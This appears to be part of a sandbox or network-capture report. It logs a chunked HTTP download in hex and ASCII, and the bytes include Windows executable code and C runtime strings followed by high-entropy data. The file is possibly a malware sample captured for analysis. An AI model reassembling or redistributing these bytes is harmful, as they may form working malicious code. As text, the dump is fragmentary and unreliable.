2023-10-13 13:21:06 UTC	15	IN	Data Raw: 32 30 30 30 0d 0a 41 70 72 69 6c 00 00 00 4d 61 72 63 68 00 00 00 46 65 62 72 75 61 72 79 00 00 00 00 4a 61 6e 75 61 72 79 00 44 65 63 00 4e 6f 76 00 4f 63 74 00 53 65 70 00 41 75 67 00 4a 75 6c 00 4a 75 6e 00 4d 61 79 00 41 70 72 00 4d 61 72 00 46 65 62 00 4a 61 6e 00 53 61 74 75 72 64 61 79 00 00 00 00 46 72 69 64 61 79 00 00 54 68 75 72 73 64 61 79 00 00 00 00 57 65 64 6e 65 73 64 61 79 00 00 00 54 75 65 73 64 61 79 00 4d 6f 6e 64 61 79 00 00 53 75 6e 64 61 79 00 00 53 61 74 00 46 72 69 00 54 68 75 00 57 65 64 00 54 75 65 00 4d 6f 6e 00 53 75 6e 00 70 94 42 00 c8 94 42 00 43 4f 4e 4f 55 54 24 00 53 75 6e 4d 6f 6e 54 75 65 57 65 64 54 68 75 46 72 69 53 61 74 00 00 00 4a 61 6e 46 65 62 4d 61 72 41 70 72 4d 61 79 4a 75 6e 4a 75 6c 41 75 67 53 65 70 4f 63 Data Ascii: 2000AprilMarchFebruaryJanuaryDecNovOctSepAugJulJunMayAprMarFebJanSaturdayFridayThursdayWednesdayTuesdayMondaySundaySatFriThuWedTueMonSunpBBCONOUT$SunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOc
2023-10-13 13:21:06 UTC	23	IN	Data Raw: 10 9b df e0 db 2d Data Ascii: -
2023-10-13 13:21:06 UTC	23	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:06 UTC	23	IN	Data Raw: 32 30 30 30 0d 0a b0 72 42 00 dd 5d f8 9b 9b df e0 f6 c1 10 74 0a db 2d bc 72 42 00 dd 5d f8 9b f6 c1 04 74 09 d9 ee d9 e8 de f1 dd d8 9b f6 c1 20 74 06 d9 eb dd 5d f8 9b c9 c3 6a 08 68 48 58 42 00 e8 8f 0d 00 00 33 c0 39 05 14 c1 59 00 74 56 f6 45 08 40 74 48 39 05 c8 72 42 00 74 40 89 45 fc 0f ae 55 08 eb 2e 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 25 c8 72 42 00 00 83 65 08 bf 0f ae 55 08 c7 45 fc fe ff ff ff eb 08 83 65 08 bf 0f ae 55 08 e8 6f 0d 00 00 c3 c3 b8 d4 9e 40 00 a3 c0 7d 42 00 c7 05 c4 7d 42 00 bb 95 40 00 c7 05 c8 7d 42 00 6f 95 40 00 c7 05 cc 7d 42 00 a8 95 40 00 c7 05 d0 7d 42 00 11 95 40 00 a3 d4 7d 42 00 c7 05 d8 7d 42 00 4c 9e 40 00 c7 05 dc 7d 42 00 2d 95 40 00 c7 05 e0 7d 42 00 Data Ascii: 2000rB]t-rB]t t]jhHXB39YtVE@tH9rBt@EU.E=t=t33@e%rBeUEeUo@}B}B@}Bo@}B@}B@}B}BL@}B-@}B
2023-10-13 13:21:06 UTC	31	IN	Data Raw: 83 e8 20 0f 84 08 Data Ascii:
2023-10-13 13:21:06 UTC	31	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:06 UTC	31	IN	Data Raw: 32 30 30 30 0d 0a 01 00 00 83 e8 0b 74 56 48 74 47 83 e8 18 74 2f 83 e8 0a 74 22 83 e8 04 0f 85 a1 01 00 00 39 5d f8 0f 85 d9 00 00 00 83 4d 0c 10 c7 45 f8 01 00 00 00 e9 d4 00 00 00 09 55 0c e9 cc 00 00 00 f6 45 0c 40 0f 85 b7 00 00 00 83 4d 0c 40 e9 b9 00 00 00 c7 45 f0 01 00 00 00 e9 a2 00 00 00 f6 45 0c 02 0f 85 98 00 00 00 8b 45 0c 83 e0 fe 83 c8 02 89 45 0c 8b 45 fc 83 e0 fc 0b c2 89 45 fc e9 87 00 00 00 39 5d f8 75 77 83 4d 0c 20 c7 45 f8 01 00 00 00 eb 75 83 e8 54 74 5c 83 e8 0e 74 45 48 74 31 83 e8 0b 74 17 83 e8 06 0f 85 0e 01 00 00 f7 45 0c 00 c0 00 00 75 46 09 7d 0c eb 4c 39 5d f4 75 3c 81 65 fc ff bf ff ff c7 45 f4 01 00 00 00 eb 37 39 5d f4 75 27 09 7d fc c7 45 f4 01 00 00 00 eb 26 f7 45 0c 00 c0 00 00 75 12 81 4d 0c 00 80 00 00 eb 14 f7 45 Data Ascii: 2000tVHtGt/t"9]MEUE@M@EEEEEE9]uwM EuTt\tEHt1tEuF}L9]u<eE79]u'}E&EuME
2023-10-13 13:21:06 UTC	39	IN	Data Raw: b1 e8 7b 42 00 89 Data Ascii: {B
2023-10-13 13:21:06 UTC	39	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:06 UTC	39	IN	Data Raw: 32 30 30 30 0d 0a 75 e4 eb 2a 8a 46 01 84 c0 74 28 0f b6 3e 0f b6 c0 eb 12 8b 45 e0 8a 80 d4 7b 42 00 08 44 3b 1d 0f b6 46 01 47 3b f8 76 ea 8b 7d 08 46 46 80 3e 00 75 d1 8b 75 e4 ff 45 e0 83 c6 08 83 7d e0 04 89 75 e4 72 e9 8b c7 89 7b 04 c7 43 08 01 00 00 00 e8 67 fb ff ff 6a 06 89 43 0c 8d 43 10 8d 89 dc 7b 42 00 5a 66 8b 31 41 66 89 30 41 40 40 4a 75 f3 8b f3 e8 d7 fb ff ff e9 b7 fe ff ff 80 4c 03 1d 04 40 3b c1 76 f6 46 46 80 7e ff 00 0f 85 34 ff ff ff 8d 43 1e b9 fe 00 00 00 80 08 08 40 49 75 f9 8b 43 04 e8 12 fb ff ff 89 43 0c 89 53 08 eb 03 89 73 08 33 c0 0f b7 c8 8b c1 c1 e1 10 0b c1 8d 7b 10 ab ab ab eb a8 39 35 94 93 42 00 0f 85 58 fe ff ff 83 c8 ff 8b 4d fc 5f 5e 33 cd 5b e8 4b 05 00 00 c9 c3 6a 14 68 d8 59 42 00 e8 dc cc ff ff 83 4d e0 ff e8 Data Ascii: 2000u*Ft(>E{BD;FG;v}FF>uuE}ur{CgjCC{BZf1Af0A@@JuL@;vFF~4C@IuCCSs3{95BXM_^3[KjhYBM
2023-10-13 13:21:06 UTC	47	IN	Data Raw: 2a bf ff ff 59 59 Data Ascii: *YY
2023-10-13 13:21:06 UTC	47	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:06 UTC	47	IN	Data Raw: 32 30 30 30 0d 0a c3 c7 45 fc fe ff ff ff e8 12 00 00 00 83 7d 08 01 8b 45 e4 74 03 8b 45 dc e8 f7 ad ff ff c3 6a 01 e8 d7 a1 ff ff 59 c3 6a 01 e8 1f ff ff ff 59 c3 8b ff 55 8b ec 83 ec 30 53 33 db f6 45 10 80 56 57 8b f0 89 5d e0 88 5d fe c7 45 d0 0c 00 00 00 89 5d d4 74 09 89 5d d8 c6 45 ff 10 eb 0a c7 45 d8 01 00 00 00 88 5d ff 8d 45 e0 50 e8 59 39 00 00 59 85 c0 74 0d 53 53 53 53 53 e8 98 92 ff ff 83 c4 14 8b 4d 10 b8 00 80 00 00 85 c8 75 11 f7 c1 00 40 07 00 75 05 39 45 e0 74 04 80 4d ff 80 8b c1 83 e0 03 2b c3 ba 00 00 00 c0 bf 00 00 00 80 74 47 48 74 2e 48 74 26 e8 fd 93 ff ff 89 18 83 0e ff e8 e0 93 ff ff 6a 16 5e 53 53 53 53 53 89 30 e8 69 93 ff ff 83 c4 14 e9 00 05 00 00 89 55 f8 eb 19 f6 c1 08 74 08 f7 c1 00 00 07 00 75 ee c7 45 f8 00 00 00 40 Data Ascii: 2000E}EtEjYjYU0S3EVW]]E]t]EE]EPY9YtSSSSSMu@u9EtM+tGHt.Ht&j^SSSSS0iUtuE@
2023-10-13 13:21:06 UTC	55	IN	Data Raw: f8 83 61 70 fd c9 Data Ascii: ap
2023-10-13 13:21:06 UTC	55	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:06 UTC	55	IN	Data Raw: 32 30 30 30 0d 0a c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 81 01 00 00 ff 76 04 e8 e6 6c ff ff ff 76 08 e8 de 6c ff ff ff 76 0c e8 d6 6c ff ff ff 76 10 e8 ce 6c ff ff ff 76 14 e8 c6 6c ff ff ff 76 18 e8 be 6c ff ff ff 36 e8 b7 6c ff ff ff 76 20 e8 af 6c ff ff ff 76 24 e8 a7 6c ff ff ff 76 28 e8 9f 6c ff ff ff 76 2c e8 97 6c ff ff ff 76 30 e8 8f 6c ff ff ff 76 34 e8 87 6c ff ff ff 76 1c e8 7f 6c ff ff ff 76 38 e8 77 6c ff ff ff 76 3c e8 6f 6c ff ff 83 c4 40 ff 76 40 e8 64 6c ff ff ff 76 44 e8 5c 6c ff ff ff 76 48 e8 54 6c ff ff ff 76 4c e8 4c 6c ff ff ff 76 50 e8 44 6c ff ff ff 76 54 e8 3c 6c ff ff ff 76 58 e8 34 6c ff ff ff 76 5c e8 2c 6c ff ff ff 76 60 e8 24 6c ff ff ff 76 64 e8 1c 6c ff ff ff 76 68 e8 14 6c ff ff ff 76 6c e8 0c 6c ff ff ff 76 70 e8 04 Data Ascii: 2000UVuvlvlvlvlvlvl6lv lv$lv(lv,lv0lv4lvlv8wlv<ol@v@dlvD\lvHTlvLLlvPDlvT<lvX4lv\,lv`$lvdlvhlvllvp
2023-10-13 13:21:06 UTC	63	IN	Data Raw: 80 42 00 4e 8d 4e Data Ascii: BNN
2023-10-13 13:21:06 UTC	63	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:06 UTC	63	IN	Data Raw: 31 66 66 38 0d 0a 01 8b c1 99 83 e2 1f 03 c2 c1 f8 05 8b d1 81 e2 1f 00 00 80 89 45 f4 79 05 4a 83 ca e0 42 6a 1f 59 2b ca 33 d2 42 d3 e2 8d 5c 85 e0 89 4d f0 85 13 0f 84 82 00 00 00 83 ca ff d3 e2 f7 d2 85 54 85 e0 eb 05 83 7c 85 e0 00 75 08 40 83 f8 03 7c f3 eb 66 8b c6 99 6a 1f 59 23 d1 03 c2 c1 f8 05 81 e6 1f 00 00 80 79 05 4e 83 ce e0 46 83 65 08 00 33 d2 2b ce 42 d3 e2 8d 4c 85 e0 8b 31 8d 3c 16 3b fe 72 04 3b fa 73 07 c7 45 08 01 00 00 00 89 39 8b 4d 08 eb 1f 85 c9 74 1e 8d 4c 85 e0 8b 11 8d 72 01 33 ff 3b f2 72 05 83 fe 01 73 03 33 ff 47 89 31 8b cf 48 79 de 8b 4d f0 83 c8 ff d3 e0 21 03 8b 45 f4 40 83 f8 03 7d 0d 6a 03 59 8d 7c 85 e0 2b c8 33 c0 f3 ab 8b 0d fc 80 42 00 41 8b c1 99 83 e2 1f 03 c2 8b d1 c1 f8 05 81 e2 1f 00 00 80 79 05 4a 83 ca e0 Data Ascii: 1ff8EyJBjY+3B\MT\|u@\|fjY#yNFe3+BL1<;r;sE9MtLr3;rs3G1HyM!E@}jY\|+3BAyJ
2023-10-13 13:21:06 UTC	71	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-10-13 13:21:06 UTC	71	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2023-10-13 13:21:06 UTC	79	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:06 UTC	79	IN	Data Raw: 32 30 30 30 0d 0a 76 62 4e 57 d5 7a 4b 47 c4 51 77 58 00 53 78 c1 16 e7 40 3e a8 5e 4e 15 17 3e ed f7 f5 d6 ee b2 61 c6 70 90 8a 3b 26 78 bc 7f d0 df 5c b5 ec 03 3e 7f 2b c0 cb 1d f0 14 1d 87 05 dd 17 14 0b b7 e8 75 1d b0 1d ce 3a a4 c6 70 60 68 b1 e7 d0 e7 6d 7d a2 2b 5f b1 87 bf 8f 2b 5f bb cf 38 22 0a 49 96 fb 52 06 93 5b 75 94 ea 92 8a 7d ff 94 fe 7f d0 b6 19 84 1c 78 35 d6 06 51 65 e4 8d 22 54 9f bc 11 3d 4b 2a aa 80 82 91 44 cd 81 74 6e 38 1b ee 66 f1 27 0d 20 17 bd 1e 91 96 0d 25 c7 3a 93 ec df 97 25 1b a5 f0 f0 e2 06 b4 76 fb 1e f9 bc f8 9e 0f 57 ab af f8 28 05 13 46 ef 3a 98 8b 76 e9 12 2a 51 71 32 25 c2 38 67 8f 40 b4 86 f7 b3 2a 46 58 c0 ff 91 08 7e 0a 9b 8b 07 24 95 32 f3 bf b7 0a 08 30 a4 ac d8 a7 d0 5d 1c 43 52 63 e7 8b bf cf b6 25 03 a9 ae Data Ascii: 2000vbNWzKGQwXSx@>^N>ap;&x\>+u:p`hm}+_+_8"IR[u}x5Qe"T=KDtn8f' %:%vW(F:vQq2%8g@*FX~$20]CRc%
2023-10-13 13:21:06 UTC	87	IN	Data Raw: 1e 31 05 47 cb a4 Data Ascii: 1G
2023-10-13 13:21:06 UTC	87	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:06 UTC	87	IN	Data Raw: 32 30 30 30 0d 0a 7f 31 02 e1 c4 70 96 39 86 55 a5 c3 45 de 0c ac ed c5 d8 38 f7 3e 22 07 e2 16 61 af 04 f5 ff 35 36 a7 34 3b 06 3a b4 aa fb 75 8c d0 8f e4 29 8b 30 ab a6 9a 8b 28 46 22 2c 33 98 5d 91 60 6d 17 5c 31 04 5f 8d 68 0a 37 0c bd ef d0 f9 77 7d ac 61 8d bd d3 5a a5 b7 86 e6 f0 65 1e 28 8e b4 68 ba 3f fa b4 e2 a9 65 63 26 5a 17 7e f2 42 5c 38 14 32 94 cf fc 15 f3 34 ee b0 4b 25 e2 c6 42 64 d0 29 03 33 1f 1a 28 9a 34 e2 76 2d 30 1e ed 30 6c 50 cf 29 c9 f8 64 fb ab b9 35 06 05 2a 4a 3c 7f 2f 0c c2 54 90 16 4a e3 fb b4 2a 3c 51 ea 73 9f a9 52 53 bf ff 0e 73 9e 1b c7 b4 5a 89 de 7b 6d 60 df ad 00 62 2f 7b 1a bf ed 58 86 fc 12 e5 dc 7d da 78 0b 21 a2 77 3e 7e 1a 09 79 55 58 33 67 6d 14 7f 29 34 69 ba 20 7d 9c c0 77 73 6b 85 0d 44 c9 fe ea 5f fd 1b b2 Data Ascii: 20001p9UE8>"a564;:u)0(F",3]`m\1_h7w}aZe(h?ec&Z~B\824K%Bd)3(4v-00lP)d5J</TJ<QsRSsZ{m`b/{X}x!w>~yUX3gm)4i }wskD_
2023-10-13 13:21:06 UTC	95	IN	Data Raw: c9 08 e4 3e 30 58 Data Ascii: >0X
2023-10-13 13:21:06 UTC	95	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	97	IN	Data Raw: 32 30 30 30 0d 0a 35 62 a6 13 d1 85 c9 36 48 64 3c 0c d8 d3 96 3e 0f 2e dc 14 f6 82 db 37 2f 7a aa 5e ca 55 61 d3 76 0f 3b 09 95 a4 09 c3 19 e7 9b e2 c6 26 53 0f 12 97 99 8c 4f e5 8e 90 74 a6 64 75 87 5e 36 17 26 4c 4f 0f 58 95 1d a7 ac 6b d9 ab 01 d8 43 de 63 b3 5d a6 24 de ab a0 58 65 4a 57 15 c2 40 2e a7 35 66 6d 09 d8 cd ac 1a 5a 16 8f b8 a7 03 cd 99 31 17 59 4c ac 98 4d 46 d1 e0 e7 98 67 d9 48 06 1f a0 00 bc 79 90 19 59 88 b2 0d 50 4b b4 d7 1f bb 13 6a fa 20 73 05 f2 2d 1b 0b 2c b2 b1 d7 f6 20 51 47 34 a7 55 94 91 48 8a 27 82 83 fd 10 7f 18 93 83 e3 d8 9f 84 ff 8c 73 29 c8 37 cc b4 eb 5b 32 eb 85 17 26 dc 28 7b d7 01 f5 85 e7 d4 3a 7e 3f e4 43 a3 da a2 c8 74 b8 03 f2 8e c6 03 dc 8b b4 08 4f 32 9f 92 6a 40 e8 34 63 af 54 f9 67 61 16 00 3a 90 3c bb eb Data Ascii: 20005b6Hd<>.7/z^Uav;&SOtdu^6&LOXkCc]$XeJW@.5fmZ1YLMFgHyYPKj s-, QG4UH's)7[2&({:~?CtO2j@4cTga:<
2023-10-13 13:21:07 UTC	105	IN	Data Raw: f8 f2 92 5a 3b 03 Data Ascii: Z;
2023-10-13 13:21:07 UTC	105	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	105	IN	Data Raw: 32 30 30 30 0d 0a 1c e7 d2 04 fe 01 85 1e f1 73 eb 46 d3 73 1e 68 5b 5c 71 55 51 c7 25 1b 01 fa eb 9a ff 4a af b7 7a a4 34 9b 09 31 14 37 14 99 9c af 0a 6c 87 ef 26 1e 04 75 1b 0b e9 79 06 78 1b 04 e9 84 32 22 2f e8 d5 a8 15 bc 5f 8d c6 c1 3d cd 18 c9 70 88 98 59 91 2a 99 7d 6c a9 d9 e2 20 c7 19 bd 66 b3 ec b2 5e db a3 a8 aa de 9c 31 8c 3a 9f 1d 29 a3 25 97 6e fc 71 2f 6c 81 51 47 7a 1e d1 54 90 c5 62 87 33 6f 14 13 cd bf f1 8e e5 d9 7f d4 b5 aa 3e 15 e4 fe 48 13 50 b4 3e 6d 16 30 59 23 58 b1 bf fe a9 93 27 c9 d2 3a a3 80 4b 2c 97 ba ea 38 8e b4 31 cd ed 35 92 aa 18 16 3a eb 4b 7d b3 b4 c4 6e fa 72 c1 44 1b d6 a7 26 95 bb d2 8a c4 f0 91 44 50 3c ca 70 ee 8c d3 57 46 36 54 15 56 c9 3f 7b cf 7a 83 fa 9c e6 fa 69 35 df e1 49 70 37 7a 67 90 84 04 40 5b dc 3e Data Ascii: 2000sFsh[\qUQ%Jz417l&uyx2"/_=pY*}l f^1:)%nq/lQGzTb3o>HP>m0Y#X':K,815:K}nrD&DP<pWF6TV?{zi5Ip7zg@[>
2023-10-13 13:21:07 UTC	113	IN	Data Raw: a4 ae 67 66 fb 5e Data Ascii: gf^
2023-10-13 13:21:07 UTC	113	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	113	IN	Data Raw: 32 30 30 30 0d 0a 2c af b6 2a c1 73 d4 41 3d 7a 73 be 13 d7 4b 8f 5b ab 38 f9 2b ae 17 72 7c 40 08 7e 7f 4e a5 2a 77 c7 62 70 6e c2 16 11 48 1d 96 e5 3a ec 18 51 92 7b f8 20 aa 1f 33 cd 95 46 0d 8f 04 6d b5 aa e4 cb 71 62 c7 f4 2c 34 47 65 92 64 11 c0 f1 e9 19 11 86 34 86 c8 63 fc c7 ac 13 ff 29 ae dd f5 9c e0 a7 01 4e 02 6e 0e c1 98 e4 59 da d4 dd 95 6a 76 25 da 94 34 27 44 41 e2 86 94 88 c1 c8 b3 a9 4b 1f c6 23 9e 92 9f 68 f4 41 52 70 52 7c 79 1d fb f9 33 b2 e8 74 d8 f1 5a d3 ec 2c ba 11 04 d6 f8 ef fb 99 d8 8e fb 4b a8 7f ba 36 62 5c f0 bc 4e e0 57 8e e3 63 60 fa a0 98 7a 8d b9 1a 6d 56 43 08 70 de e2 cb e9 21 bd 00 b7 06 ee 01 44 9e 61 be 2b d2 a7 8c 16 21 2a 3b 74 f1 53 ef af 44 33 4b ef d3 e7 b1 ac 22 87 5b a0 8b 93 0e aa 84 ab 5f 55 8e 72 db 0e 3a Data Ascii: 2000,sA=zsK[8+r\|@~NwbpnH:Q{ 3Fmqb,4Ged4c)NnYjv%4'DAK#hARpR\|y3tZ,K6b\NWc`zmVCp!Da+!*;tSD3K"[_Ur:
2023-10-13 13:21:07 UTC	121	IN	Data Raw: ea 61 e2 b8 d0 92 Data Ascii: a
2023-10-13 13:21:07 UTC	121	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	121	IN	Data Raw: 32 30 30 30 0d 0a e2 37 b3 17 2d 37 38 bf f0 ec 4f 76 4d c7 f6 d0 ae 1b db ac 0d dc 04 94 21 89 ef 22 b1 40 fa 8e 00 cb 1a 95 49 15 bd 13 9a b1 b5 25 58 9b a1 a0 91 cd 4f 8e 34 6e 39 6e 1e 16 74 68 c1 6e 68 7f 14 35 31 79 52 48 e6 07 82 8a 21 66 21 b0 1b 99 47 11 b6 82 6d 76 11 a0 14 04 f9 2d 6b de 8c 69 08 9f d7 a6 fc 49 0a a0 fc bf 0b be ea f7 d9 70 4b 1f 69 7f e5 07 3f 44 40 1c 93 46 3a 65 f8 bb 04 bb 02 65 e5 81 74 02 cd 37 fd 05 95 ca 45 af 43 a9 89 27 d8 98 1c 76 89 ba 19 f9 90 24 70 bc 6e b0 3a 57 09 7b 4f 74 7b 36 26 b3 52 f5 8a be 47 ad 9f da cb 2c a3 0f d0 c9 27 70 c8 92 99 07 a1 f2 5e 4d ef 04 19 b7 6a df 0e da a2 df f3 26 61 8e 95 c7 50 32 03 1e e5 fe 64 dc 08 d7 c6 61 64 f6 b5 6d e2 d0 5a d2 df e7 8c 5b 7c 78 73 0c 66 9c bb 13 ac c7 43 92 9f Data Ascii: 20007-78OvM!"@I%XO4n9nthnh51yRH!f!Gmv-kiIpKi?D@F:eet7EC'v$pn:W{Ot{6&RG,'p^Mj&aP2dadmZ[\|xsfC
2023-10-13 13:21:07 UTC	129	IN	Data Raw: 74 bb 0c 84 d3 d6 Data Ascii: t
2023-10-13 13:21:07 UTC	129	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	129	IN	Data Raw: 31 66 66 38 0d 0a 3a 64 0e f9 2b c5 dd fb eb 2a 87 00 47 ad 2f 33 ff d7 6f 56 41 6b 54 5f a9 08 bc fe c7 b9 78 57 f3 5e a7 7c 82 67 6c 34 c8 3c d7 a2 26 de 0e 9e 73 64 a6 bd 8e df ef 39 6d c5 f1 84 a8 ea 72 9f cf d8 16 87 a6 97 9c 45 52 b1 7d 04 be aa d4 3a fb 0e 8c 89 5c 2b fb 59 2f 8e d5 6e b2 0b 1c fa 63 d6 41 56 85 a9 24 ac c2 54 1b 2e 9a 60 ba 56 22 bd 07 36 24 2c 79 c4 31 75 fb 7b 59 12 0e 93 43 4d d2 41 44 7a bb df 20 1b 7e e1 fb 79 1a f8 e9 f7 19 08 6d 15 69 5e 0b 7c dd 44 4a ad f6 95 8b 46 f2 12 b2 3c aa 21 76 2e 50 de b5 6b 47 90 f1 94 f8 c8 0c cb f0 c5 f6 5b 63 2e 4d 85 0b f1 63 a4 76 e3 75 87 d2 0a 23 8b a1 be 9d b3 7f cb 0e 8d f9 a2 55 3b 25 e9 56 43 ab 4d d1 cc 35 fd 30 e7 c2 9e 0b fa bc d2 a2 ed 5f dc 4c b4 c1 12 79 8d b4 36 5c 4f 18 25 04 Data Ascii: 1ff8:d+*G/3oVAkT_xW^\|gl4<&sd9mrER}:\+Y/ncAV$T.`V"6$,y1u{YCMADz ~ymi^\|DJF<!v.PkG[c.Mcvu#U;%VCM50_Ly6\O%
2023-10-13 13:21:07 UTC	137	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-10-13 13:21:07 UTC	137	IN	Data Raw: 89 2c ff 5f bf 45 d7 a5 0a 79 df ca d5 56 64 9d bd a0 bd cf ba 0b 45 84 76 b5 72 36 8d 90 01 49 d6 63 64 6b df 13 df cb 07 bf dc 82 6f ec c3 90 a8 51 50 84 57 b0 01 cd 6b 7c 66 b9 d6 20 7a 2a 66 76 9b 00 d3 55 a6 22 07 ad 5d 2e ce bd 7f 00 65 12 93 b1 a3 ba fa 9c 12 fd 84 b9 a9 5f 03 16 7b 7f 1e ae d7 1a 58 9d 9b c3 71 21 d3 6d da 44 ea 30 3b 3c 31 f5 a3 97 e0 7f 4c 00 58 43 13 6c 4e b7 ca 18 cf 12 cb 72 d8 fd 81 fd b6 46 11 ad fe 4e 6a ac fe a7 67 80 e5 f1 65 b9 5e 80 9c 2e 40 cc 3a 47 f1 d1 59 db 4a d7 fd 9b 26 d8 54 2c 7c c1 4d 1a 74 1d 44 df dc f3 ff 46 61 65 af 1b bd 25 f9 b8 24 d5 6d 67 82 c7 f1 b6 6b 50 05 4a 42 3f 4d 2b 7a 7f 7a 0a 03 38 57 cd bf 3f 4b 44 76 d1 1e 10 7c 80 bd 54 7e 09 a9 ee 5e 90 6a c2 dd df 00 56 ea 80 df 25 87 9f 2b 39 2f 76 ee Data Ascii: ,_EyVdEvr6IcdkoQPWk\|f z*fvU"].e_{Xq!mD0;<1LXClNrFNjge^.@:GYJ&T,\|MtDFae%$mgkPJB?M+zz8W?KDv\|T~^jV%+9/v
2023-10-13 13:21:07 UTC	145	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	145	IN	Data Raw: 32 30 30 30 0d 0a 72 cd b9 1e 14 ad e1 f1 42 b5 db 00 1d 19 0d 10 3b 57 ba 20 f4 f8 50 c4 5b 89 5e 4b 34 e3 bd c4 c2 34 bd bd 44 aa 29 b2 4f ec b2 e7 3b 88 05 a5 d0 16 65 eb 0a cc fe 9c 4a 0a aa b9 59 b3 45 60 f1 51 9d 0e 0a 15 53 cd f3 7c 37 1d 6f 59 d0 bf 28 10 e4 9d a0 18 84 80 54 a9 50 ab a8 dc 1c 5b e5 d4 06 5d c0 c6 9e 3d 58 48 d8 c6 ac bd f0 05 90 2b 16 ae d3 ae d0 fc 92 fa 4a 52 7f e4 f1 1c 0a 7b 7f 51 6e 0f b4 64 d5 72 e6 79 78 16 ec 63 aa 01 94 55 1f ce ca 2d e1 6a 96 70 60 a8 7e 66 c7 22 ae d8 4c e8 9e bb fd da 3d 95 47 eb 6f c3 91 47 83 d9 3b 94 61 01 1c b0 5c 87 33 66 6b 2f 24 ab 3b bc e6 42 df e6 46 91 01 36 20 a1 e7 09 9e 8a 91 02 a4 05 26 eb ed 7e e6 a8 3d 3f 1d 11 38 4b 90 b5 50 ef ab ba 55 5a 32 11 f9 94 ed bf f2 92 d6 ba f3 b4 74 ee 15 Data Ascii: 2000rB;W P[^K44D)O;eJYE`QS\|7oY(TP[]=XH+JR{QndryxcU-jp`~f"L=GoG;a\3fk/$;BF6 &~=?8KPUZ2t
2023-10-13 13:21:07 UTC	153	IN	Data Raw: a5 b2 ab e5 a2 3a Data Ascii: :
2023-10-13 13:21:07 UTC	153	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	153	IN	Data Raw: 32 30 30 30 0d 0a 2f 81 39 a2 b6 2c 44 32 0a bb 20 02 4b 15 30 75 28 1b 3c 82 8a 97 0d 7e f3 ee b6 79 6c bf fb cd af 6e b6 23 17 1c bd c6 fb 42 97 7b 65 0d 47 70 24 8c f5 cc f6 c2 6a d9 59 ad 99 99 f9 b2 3d 3f 2a 38 ec 7e ba 63 00 ee ab d6 f9 07 42 01 0a 6d 7d 0d bd aa 28 0f d2 44 61 99 43 af 1d 3e f5 9f e7 7e 4c 89 3f 48 32 70 34 8e 27 4c fb 68 c6 4d ec 8c cf 04 8f 43 e0 3a e4 0b 12 3f 7e fc ed 29 24 da 14 ba 91 4c 98 6c cf 95 b3 a5 eb 6b a8 91 3d c6 ca e7 1f ae d3 24 37 25 dd e5 e3 24 92 2d e8 ca 3f 78 38 d8 a7 ad a1 5e 84 cd d1 0c 96 06 bd d7 d9 5e 7d 9b 35 90 1a 8e a3 24 70 25 fd 10 c5 b1 fd 72 2a 44 1a 15 18 76 4f 1a 64 73 5f 9c 2a 96 4a b8 a6 7a 23 6e cd b9 48 80 81 1a 63 02 ad 6b 61 54 69 18 17 51 3c ce 89 9e 76 29 3e c3 a5 ce 81 75 82 bb cb 3a a8 Data Ascii: 2000/9,D2 K0u(<~yln#B{eGp$jY=?8~cBm}(DaC>~L?H2p4'LhMC:?~)$Llk=$7%$-?x8^^}5$p%rDvOds_*Jz#nHckaTiQ<v)>u:
2023-10-13 13:21:07 UTC	161	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-10-13 13:21:07 UTC	161	IN	Data Raw: 0d 0a Data Ascii:
